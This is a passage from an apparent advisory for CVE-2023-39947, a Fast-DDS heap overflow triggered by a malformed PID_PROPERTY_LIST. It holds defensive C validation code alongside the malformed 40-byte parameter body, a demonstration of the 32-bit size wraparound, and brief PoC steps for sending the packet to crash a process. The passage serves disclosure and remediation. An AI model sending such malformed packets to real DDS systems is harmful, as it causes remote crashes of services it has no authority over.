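As an added illustration (my code, not Fast-DDS code and not part of the advisory), a C routine that walks the PID_PROPERTY_LIST body shown above and rejects any CDR string whose declared length exceeds the bytes left in the parameter, next to an overflow-safe size computation for the storage a property would need. BAD_BODY is the 40-byte body from the advisory; GOOD_BODY is a constructed well-formed counterpart. Computed naively in 32-bit arithmetic, 4 + pad(17) + 4 + pad(0xfffffff3) wraps to 16, which matches the 16-byte region and 17-byte write in the ASan report; that connection is my reading, not something the advisory states.

```c
/* Defensive handling of a PID_PROPERTY_LIST body: bounds-checked string lengths
 * while walking the parameter, and wrap-safe size arithmetic for reservation. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef enum {
    PROPLIST_OK = 0,
    PROPLIST_TRUNCATED,                /* a field runs past the parameter end */
    PROPLIST_LENGTH_EXCEEDS_PARAMETER  /* declared string size > bytes left */
} proplist_status;

static uint32_t read_u32_le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* a + b, or false if the sum would wrap in 32 bits. */
static bool add_u32(uint32_t a, uint32_t b, uint32_t *out)
{
    if (a > UINT32_MAX - b) return false;
    *out = a + b;
    return true;
}

/* CDR pads each string to a 4-byte boundary; computed without wrapping. */
static bool pad4(uint32_t len, uint32_t *out)
{
    uint32_t tmp;
    if (!add_u32(len, 3, &tmp)) return false;
    *out = tmp & ~(uint32_t)3;
    return true;
}

/* Walk the body of a PID_PROPERTY_LIST (the bytes after the 2-byte PID and
 * 2-byte length). Each declared CDR string length is checked against the bytes
 * remaining in the parameter before anything would be copied. On success,
 * *strings receives the number of strings found. */
proplist_status validate_property_list(const uint8_t *body, uint32_t body_len,
                                       uint32_t *strings)
{
    uint32_t pos = 4, count = 0; /* skip the leading uint32 word shown above */
    if (body_len < 4) return PROPLIST_TRUNCATED;
    while (pos < body_len) {
        uint32_t remaining = body_len - pos;
        if (remaining < 4) return PROPLIST_TRUNCATED;
        uint32_t len = read_u32_le(body + pos);
        pos += 4;
        remaining -= 4;
        /* The malformed parameter declares 0xfffffff3 with only 8 bytes left. */
        if (len > remaining) return PROPLIST_LENGTH_EXCEEDS_PARAMETER;
        uint32_t padded;
        if (!pad4(len, &padded) || padded > remaining) return PROPLIST_TRUNCATED;
        pos += padded;
        count++;
    }
    *strings = count;
    return PROPLIST_OK;
}

/* Bytes needed to store one (name, value) pair as two length-prefixed, padded
 * CDR strings. Returns false instead of handing back a wrapped, too-small size. */
bool checked_property_size(uint32_t name_len, uint32_t value_len, uint32_t *out)
{
    uint32_t n, v;
    if (!pad4(name_len, &n) || !pad4(value_len, &v)) return false;
    return add_u32(n, 4, &n) && add_u32(v, 4, &v) && add_u32(n, v, out);
}

/* The same computation done naively in uint32_t: with the advisory's lengths
 * (17 and 0xfffffff3) it wraps to 16, and a 17-byte copy then overruns it. */
uint32_t unchecked_property_size(uint32_t name_len, uint32_t value_len)
{
    return 4 + ((name_len + 3) & ~(uint32_t)3) + 4 + ((value_len + 3) & ~(uint32_t)3);
}

/* The 40-byte PID_PROPERTY_LIST body from the advisory (after "59 00 28 00"). */
const uint8_t BAD_BODY[40] = {
    0x01, 0x00, 0x00, 0x00,                        /* leading word */
    0x11, 0x00, 0x00, 0x00,                        /* size: 17 */
    'P','A','R','T','I','C','I','P','A','N','T','_','T','Y','P','E', 0, 0, 0, 0,
    0xf3, 0xff, 0xff, 0xff,                        /* size: 4294967283 */
    'S','I','M','P','L','E', 0, 0 };               /* 8 bytes of data */

/* Constructed well-formed counterpart: the second string declares 7 bytes. */
const uint8_t GOOD_BODY[40] = {
    0x01, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00,
    'P','A','R','T','I','C','I','P','A','N','T','_','T','Y','P','E', 0, 0, 0, 0,
    0x07, 0x00, 0x00, 0x00, 'S','I','M','P','L','E', 0, 0 };

int main(void)
{
    uint32_t n = 0, size = 0;
    proplist_status good = validate_property_list(GOOD_BODY, 40, &n);
    printf("good body: status %d, %u strings\n", good, n);
    printf("bad body:  status %d\n", validate_property_list(BAD_BODY, 40, &n));
    printf("unchecked size: %u, checked size accepted: %d\n",
           unchecked_property_size(17, 0xfffffff3u),
           checked_property_size(17, 0xfffffff3u, &size));
    return 0;
}
```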
PoC

Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.

Impact

This can remotely crash any Fast-DDS process.

Severity

High


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

CVE ID

CVE-2023-39947
